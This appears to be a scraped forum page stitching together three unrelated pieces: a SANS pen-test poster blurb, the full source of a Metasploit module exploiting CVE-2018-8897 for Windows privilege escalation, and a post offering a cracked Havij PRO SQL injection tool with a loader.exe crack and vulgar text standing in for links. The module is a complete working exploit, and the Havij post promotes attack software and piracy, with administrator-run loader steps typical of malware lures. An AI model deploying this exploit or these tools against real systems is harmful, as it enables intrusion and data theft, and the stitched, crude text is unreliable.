Leaderboard

Imagine you are sitting at your desk and come across a great command line tip that will assist you in your career as an information security professional, so you jot the tip down on a note, post-it, or scrap sheet of paper and tape it to your white board... now imagine you do this all the time until your white board is completely full of useful tips you've found and can use daily. That is the concept behind the SANS Pen Test Poster: White Board of Awesome Command Line Kung-Fu created by the SANS Pen Test Instructors. Each tip was submitted by the Pen Test Instructors and curated by SANS Fellow, Ed Skoudis. We are giving you a complete white board full of tips you can use to become a better InfoSec professional. This poster is the 2016-2017 SANS Pen Test Poster and the printed version has been given away at SANS Training Events, Information Security Conferences, and sent in the mail to thousands of SANS Alumni. Now it is available for you to download. Download PDF - PENT-PSTR-WHITEBOARD-V3-0118_web.pdf Additional Educational Posts based on the Poster: Python: "White Board" - Python - Python Debugger "White Board" - Python - Python Reverse Shell! "White Board" - Python - Pythonic Web Server "White Board" - Python - Raw Shell -> Terminal "White Board" - Python - Pythonic Web Client Bash: "White Board" - Bash - Useful IPv6 Pivot "White Board" - Bash - Encrypted Exfil Channel! "White Board" - Bash - What's My Public IP Address? "White Board" - Bash - Bash's Built-In Netcat Client "White Board" - Bash - Check Service Every Second "White Board" - Bash - Make Output Easier to Read "White Board" - Bash - Website Cloner "White Board" - Bash - Sudo... Make Me a Sandwich "White Board" - Bash - Find Juicy Stuff in File System CMD.exe: "White Board" - CMD.exe - C:\> netsh interface "White Board" - CMD.exe - C:\> wmic process PowerShell: "White Board" - PowerShell - Add a Firewall Rule "White Board" - PowerShell - Built-in Port Scanner! "White Board" - PowerShell - Get Firewall Rules "White Board" - PowerShell - One-Line Web Client "White Board" - PowerShell - Ping Sweeper! "White Board" - PowerShell - Find Juicy Stuff in the File System Desktop Wallpapers based on Poster: Bash, PowerShell, Python... https://pen-testing.sans.org/blog/2018/01/17/sans-poster-white-board-of-command-line-kung-fu-pdf-download/

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core/post/common' require 'msf/core/post/file' require 'msf/core/post/windows/priv' require 'msf/core/post/windows/registry' require 'msf/core/exploit/exe' class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::Common include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability', 'Description' => %q{ This module exploits a vulnerability in a statement in the system programming guide of the Intel 64 and IA-32 architectures software developer's manual being mishandled in various operating system kerneles, resulting in unexpected behavior for #DB excpetions that are deferred by MOV SS or POP SS. This module will upload the pre-compiled exploit and use it to execute the final payload in order to gain remote code execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'Nick Peterson', # Original discovery (@nickeverdox) 'Nemanja Mulasmajic', # Original discovery (@0xNemi) 'Can Bölük <can1357>', # PoC 'bwatters-r7' # msf module ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows x64', { 'Arch' => ARCH_X64 } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'May 08 2018', 'References' => [ ['CVE', '2018-8897'], ['EDB', '44697'], ['BID', '104071'], ['URL', 'https://github.com/can1357/CVE-2018-8897/'], ['URL', 'https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/'] ], 'DefaultOptions' => { 'DisablePayloadHandler' => 'False' } )) register_options([ OptString.new('EXPLOIT_NAME', [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]), OptString.new('PAYLOAD_NAME', [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]), OptString.new('PATH', [false, 'Path to write binaries (%TEMP% by default).', nil]), OptInt.new('EXECUTE_DELAY', [false, 'The number of seconds to delay before executing the exploit', 3]) ]) end def setup super @exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) @payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) @exploit_name = "#{exploit_name}.exe" unless exploit_name.match(/\.exe$/i) @payload_name = "#{payload_name}.exe" unless payload_name.match(/\.exe$/i) @temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP') @payload_path = "#{temp_path}\\#{payload_name}" @exploit_path = "#{temp_path}\\#{exploit_name}" @payload_exe = generate_payload_exe end def validate_active_host begin host = session.session_host print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}") rescue Rex::Post::Meterpreter::RequestError => e elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") raise Msf::Exploit::Failed, 'Could not connect to session' end end def validate_remote_path(path) unless directory?(path) fail_with(Failure::Unreachable, "#{path} does not exist on the target") end end def validate_target if sysinfo['Architecture'] == ARCH_X86 fail_with(Failure::NoTarget, 'Exploit code is 64-bit only') end if sysinfo['OS'] =~ /XP/ fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP') end end def ensure_clean_destination(path) if file?(path) print_status("#{path} already exists on the target. Deleting...") begin file_rm(path) print_status("Deleted #{path}") rescue Rex::Post::Meterpreter::RequestError => e elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") print_error("Unable to delete #{path}") end end end def ensure_clean_exploit_destination ensure_clean_destination(exploit_path) end def ensure_clean_payload_destination ensure_clean_destination(payload_path) end def upload_exploit local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-8897-exe', 'cve-2018-8897-exe.exe') upload_file(exploit_path, local_exploit_path) print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}") end def upload_payload write_file(payload_path, payload_exe) print_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}") end def execute_exploit sleep(datastore['EXECUTE_DELAY']) print_status("Running exploit #{exploit_path} with payload #{payload_path}") output = cmd_exec('cmd.exe', "/c #{exploit_path} #{payload_path}") vprint_status(output) end def exploit begin validate_active_host validate_target validate_remote_path(temp_path) ensure_clean_exploit_destination ensure_clean_payload_destination upload_exploit upload_payload execute_exploit rescue Rex::Post::Meterpreter::RequestError => e elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") print_error(e.message) ensure_clean_exploit_destination ensure_clean_payload_destination end end attr_reader :exploit_name attr_reader :payload_name attr_reader :payload_exe attr_reader :temp_path attr_reader :payload_path attr_reader :exploit_path end Sursa: https://www.exploit-db.com/exploits/45024/?rss&amp;utm_source=dlvr.it&amp;utm_medium=twitter

link: please fuck my mom pass: babyhacking Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software, user can perform back-end database fingerprinting, retrieve DBMS login names and password hashes, dump tables and columns, fetch data from the database, execute SQL statements against the server, and even access the underlying file system and execute operating system shell commands. The distinctive power of Havij that differentiates it from similar tools lies in its unique methods of injection. The success rate of attack on vulnerable targets using Havij is above 95%. The user friendly GUI (Graphical User Interface) of Havij and its automated configuration and heuristic detections make it easy to use for everyone even amateurs. Key Features Supported Databases with injection methods: MsSQL 2000/2005 with error MsSQL 2000/2005 no error union based MsSQL Blind MySQL time based MySQL union based MySQL Blind MySQL error based MySQL time based Oracle union based Oracle error based PostgreSQL union based MsAccess union based MsAccess Blind Sybase (ASE) Sybase (ASE) Blind HTTPS support Multi-threading Proxy support Automatic database server detection Automatic type detection (string or integer) Automatic keyword detection (finding difference between the positive and negative response) Automatic scan of all parameters. Trying different injection syntaxes Options for replacing space by /**/,+,… against IDS or filters Avoids using strings (bypassing magic_quotes and similar filters) Installation Guide Download files from the links provided below Extract them using winRAR,winZIP or any other tool Run Havij 1.17 PRO.exe Copy and paste loader.exe in the folder where havij is installed (probably it is C:\Program Files (x86)\ITSecTeam\Havij Pro) Run loader.exe as an administrator Direct hit Register button BoOm!!!! Now you are using Havij PRO 😮 My blog: please fuck my mom